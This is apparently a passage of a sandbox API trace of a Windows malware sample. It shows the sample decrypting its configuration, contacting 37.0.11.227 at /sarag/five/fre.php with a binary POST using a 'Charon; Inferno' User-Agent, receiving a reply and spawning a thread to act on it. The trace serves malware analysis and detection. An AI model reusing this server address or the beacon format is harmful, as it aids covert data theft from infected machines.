phProv=0x19fca8*=0x0) returned 1 [0280.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.868] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0280.876] GetProcessHeap () returned 0x690000 [0280.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0280.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.879] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0280.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.881] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.882] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.882] GetProcessHeap () returned 0x690000 [0280.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0280.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.883] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0280.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.884] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0280.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.885] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0280.885] GetProcessHeap () returned 0x690000 [0280.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0280.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.905] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0280.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.907] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0280.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.908] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0280.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.912] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0280.912] GetProcessHeap () returned 0x690000 [0280.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0280.912] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0280.912] GetProcessHeap () returned 0x690000 [0280.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0280.913] GetProcessHeap () returned 0x690000 [0280.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0280.913] GetProcessHeap () returned 0x690000 [0280.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0280.913] GetProcessHeap () returned 0x690000 [0280.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0280.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.914] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.919] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0280.926] GetProcessHeap () returned 0x690000 [0280.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0280.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.927] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0280.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.928] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.929] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.929] GetProcessHeap () returned 0x690000 [0280.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0280.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.931] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0280.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.932] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0280.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0280.932] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0280.932] GetProcessHeap () returned 0x690000 [0280.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0280.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.933] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0280.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.934] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0280.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.935] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0280.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0280.936] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0280.936] GetProcessHeap () returned 0x690000 [0280.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0280.936] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0280.936] GetProcessHeap () returned 0x690000 [0280.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0280.936] socket (af=2, type=1, protocol=6) returned 0x8b8 [0280.936] connect (s=0x8b8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0280.966] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0280.967] GetProcessHeap () returned 0x690000 [0280.967] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0280.967] GetProcessHeap () returned 0x690000 [0280.967] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0280.967] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0280.968] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0280.968] GetProcessHeap () returned 0x690000 [0280.968] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0280.968] GetProcessHeap () returned 0x690000 [0280.969] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0280.969] GetProcessHeap () returned 0x690000 [0280.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0280.969] GetProcessHeap () returned 0x690000 [0280.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0280.970] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0280.970] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0280.970] GetProcessHeap () returned 0x690000 [0280.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0280.970] GetProcessHeap () returned 0x690000 [0280.971] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0280.971] send (s=0x8b8, buf=0x6ad508*, len=242, flags=0) returned 242 [0280.972] send (s=0x8b8, buf=0x6aba40*, len=159, flags=0) returned 159 [0280.972] GetProcessHeap () returned 0x690000 [0280.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0280.972] recv (in: s=0x8b8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0281.047] GetProcessHeap () returned 0x690000 [0281.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0281.048] GetProcessHeap () returned 0x690000 [0281.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0281.049] GetProcessHeap () returned 0x690000 [0281.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0281.049] GetProcessHeap () returned 0x690000 [0281.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0281.050] closesocket (s=0x8b8) returned 0 [0281.051] GetProcessHeap () returned 0x690000 [0281.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0281.051] GetProcessHeap () returned 0x690000 [0281.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0281.051] GetProcessHeap () returned 0x690000 [0281.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0281.051] GetProcessHeap () returned 0x690000 [0281.052] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0281.052] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1690) returned 0x8b8 [0281.057] Sleep (dwMilliseconds=0xea60) [0281.058] GetProcessHeap () returned 0x690000 [0281.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0281.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.060] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.066] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0281.072] GetProcessHeap () returned 0x690000 [0281.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0281.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.073] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0281.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.078] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.079] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.079] GetProcessHeap () returned 0x690000 [0281.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0281.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.080] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0281.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.081] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0281.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.082] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0281.082] GetProcessHeap () returned 0x690000 [0281.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0281.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.084] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.085] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.096] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.097] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.097] GetProcessHeap () returned 0x690000 [0281.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0281.097] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0281.098] GetProcessHeap () returned 0x690000 [0281.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0281.098] GetProcessHeap () returned 0x690000 [0281.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0281.098] GetProcessHeap () returned 0x690000 [0281.099] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0281.099] GetProcessHeap () returned 0x690000 [0281.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0281.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.100] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.125] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0281.143] GetProcessHeap () returned 0x690000 [0281.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0281.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.144] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0281.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.145] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.146] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.146] GetProcessHeap () returned 0x690000 [0281.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0281.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.148] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0281.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.149] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0281.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.150] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0281.150] GetProcessHeap () returned 0x690000 [0281.150] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0281.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.153] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0281.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.154] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0281.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.155] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0281.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0281.158] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0281.158] GetProcessHeap () returned 0x690000 [0281.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0281.158] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0281.158] GetProcessHeap () returned 0x690000 [0281.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0281.158] socket (af=2, type=1, protocol=6) returned 0x8bc [0281.158] connect (s=0x8bc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0281.228] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0281.228] GetProcessHeap () returned 0x690000 [0281.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0281.244] GetProcessHeap () returned 0x690000 [0281.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0281.245] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0281.246] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0281.246] GetProcessHeap () returned 0x690000 [0281.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0281.246] GetProcessHeap () returned 0x690000 [0281.247] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0281.247] GetProcessHeap () returned 0x690000 [0281.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0281.247] GetProcessHeap () returned 0x690000 [0281.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0281.248] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0281.249] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0281.249] GetProcessHeap () returned 0x690000 [0281.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0281.249] GetProcessHeap () returned 0x690000 [0281.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0281.249] send (s=0x8bc, buf=0x6ad508*, len=242, flags=0) returned 242 [0281.250] send (s=0x8bc, buf=0x6aba40*, len=159, flags=0) returned 159 [0281.250] GetProcessHeap () returned 0x690000 [0281.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0281.250] recv (in: s=0x8bc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0281.321] GetProcessHeap () returned 0x690000 [0281.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0281.321] GetProcessHeap () returned 0x690000 [0281.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0281.322] GetProcessHeap () returned 0x690000 [0281.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0281.323] GetProcessHeap () returned 0x690000 [0281.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0281.323] closesocket (s=0x8bc) returned 0 [0281.324] GetProcessHeap () returned 0x690000 [0281.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0281.324] GetProcessHeap () returned 0x690000 [0281.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0281.324] GetProcessHeap () returned 0x690000 [0281.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0281.325] GetProcessHeap () returned 0x690000 [0281.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0281.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x169c) returned 0x8bc [0281.328] Sleep (dwMilliseconds=0xea60) [0281.332] GetProcessHeap () returned 0x690000 [0281.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0281.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.335] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.344] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0281.350] GetProcessHeap () returned 0x690000 [0281.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0281.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.353] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0281.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.354] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0281.355] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.355] GetProcessHeap () returned 0x690000 [0281.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0281.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 